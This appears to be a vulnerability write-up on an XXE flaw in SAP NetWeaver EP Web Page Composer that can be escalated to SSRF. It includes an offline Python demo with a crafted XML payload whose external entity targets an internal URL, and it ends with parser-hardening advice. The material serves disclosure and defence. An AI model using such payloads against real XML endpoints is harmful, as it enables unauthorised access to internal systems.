Preface: An XML External Entity (XXE) attack is an attack against an application that parses XML input and lets an attacker-supplied document declare external entities that the parser then resolves. Server-Side Request Forgery (SSRF) is an attack in which an attacker forces a vulnerable server to send requests on the attacker's behalf to third-party servers and/or to internal resources that the attacker cannot reach directly.
Background: SAP Enterprise Portal is the Web front-end component for SAP NetWeaver – the comprehensive integration and application platform that facilitates the alignment of people, information, and business processes across organizational and technical boundaries.
Enterprise Portal (EP) provides users with a single, uniform point of access to the applications, services, and information they need for their daily work. The Portal also offers business users features to easily create and manage portal pages and generate their own content, using the following capabilities:
● KM and Web Content Capabilities
Knowledge Management (KM) provides basic document management capabilities and content services within SAP Enterprise Portal. KM provides the basic capabilities that customers need to run their scenarios, as well as an extension framework for custom implementations. These KM capabilities are also integrated into the Web Page Composer environment to enable flexible Web content management scenarios, bringing relevant information from user-generated content and business applications together in the portal.
Vulnerability details: Missing XML Validation vulnerability in SAP NetWeaver EP Web Page Composer (WPC). Product: SAP NetWeaver (EP Web Page Composer). Affected versions: 7.20, 7.30, 7.31, 7.40, 7.50.
Parts of SAP NetWeaver (EP Web Page Composer) do not sufficiently validate XML documents accepted from an untrusted source. An adversary can therefore exploit unprotected XML parsing at the affected endpoints (XXE) and use it to conduct SSRF attacks, which could compromise the system's availability by causing the server to crash.
One of the possibilities (an insider-threat example): to escalate the XXE into SSRF, the attacker declares an external entity whose SYSTEM identifier is the URL the attacker wants the server to reach (for example, an internal host), and references that entity in a data value that the application echoes back in its response. When the parser expands the entity, the server fetches that URL from its own network position, and the response from the URL then appears in the application's response.
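The following Python script is an added example that reproduces the mechanism described above; it is not SAP code and not taken from the advisory. It uses the standard library's SAX parser, which can resolve external general entities through an EntityResolver: the internal URL, the <page>/<title> document shape, the "internal status" reply and the FakeNetwork stand-in are all constructed for the demo, so it runs offline. The same payload is parsed once with external entity resolution switched on (the vulnerable configuration) and once with it left off (the hardened default), and the script records which URLs the parser tried to fetch and what ends up in the echoed <title> value.

```python
# Added example (not SAP code, not from the advisory): XXE escalated to SSRF,
# simulated with Python's stdlib SAX parser. The URL, the document shape and
# the "internal response" below are constructed for the demo.
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Hypothetical internal target the attacker wants the server to contact.
INTERNAL_URL = "http://10.0.0.5:8080/internal/status"
INTERNAL_RESPONSE = "status=ok db=up cache=up"   # constructed sample reply

# Attacker-supplied XML: the entity's SYSTEM identifier is the target URL and
# the entity is referenced in a data value (<title>) the app echoes back.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE page [
  <!ENTITY xxe SYSTEM "http://10.0.0.5:8080/internal/status">
]>
<page><title>&xxe;</title></page>
"""


class TitleCollector(ContentHandler):
    """Collects the text of <title>, i.e. the value the app would echo back."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self._chunks = []

    def startElement(self, name, attrs):
        if name == "title":
            self._in_title = True

    def endElement(self, name):
        if name == "title":
            self._in_title = False

    def characters(self, content):
        if self._in_title:
            self._chunks.append(content)

    @property
    def title(self):
        return "".join(self._chunks)


class FakeNetwork(EntityResolver):
    """Stands in for the network so the demo runs offline.

    The stdlib default resolver hands the system ID back unchanged and the
    parser then opens it with urllib.request.urlopen(): that is the real SSRF.
    Here every resolution attempt is recorded and answered from a dict.
    """

    def __init__(self, responses):
        self.responses = responses
        self.requests = []          # URLs the parser tried to fetch

    def resolveEntity(self, publicId, systemId):
        self.requests.append(systemId)
        source = InputSource(systemId)
        source.setCharacterStream(io.StringIO(self.responses.get(systemId, "")))
        return source


def parse_page(payload, resolve_external, network):
    """Parse `payload` and return the <title> text.

    resolve_external=True mimics a parser that expands external general
    entities (the vulnerable configuration); False is the hardened default
    of xml.sax since Python 3.7.1.
    """
    handler = TitleCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setEntityResolver(network)
    parser.setFeature(feature_external_ges, resolve_external)
    parser.parse(io.StringIO(payload))
    return handler.title


def run_demo():
    """Run the payload through the vulnerable and the hardened configuration."""
    results = {}
    for label, resolve in (("vulnerable", True), ("hardened", False)):
        network = FakeNetwork({INTERNAL_URL: INTERNAL_RESPONSE})
        title = parse_page(XXE_PAYLOAD, resolve, network)
        results[label] = {"title": title, "requests": list(network.requests)}
    return results


if __name__ == "__main__":
    for label, r in run_demo().items():
        print(f"{label:10s} outbound requests={r['requests']} title={r['title']!r}")
```

In the vulnerable run the parser contacts the internal URL and the reply is returned inside <title>, which is exactly the echo channel the paragraph above describes; in the hardened run no request leaves the server and the entity reference expands to nothing. The fix on the parsing side is therefore not input filtering but parser configuration: keep external general entities (and, where the parser allows it, DTD processing altogether) disabled, and treat any outbound request originating from an XML parser as a detection signal.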
Official announcement: https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Timeline:
03/30/2022 CVE reserved
06/13/2022 +75 days Advisory disclosed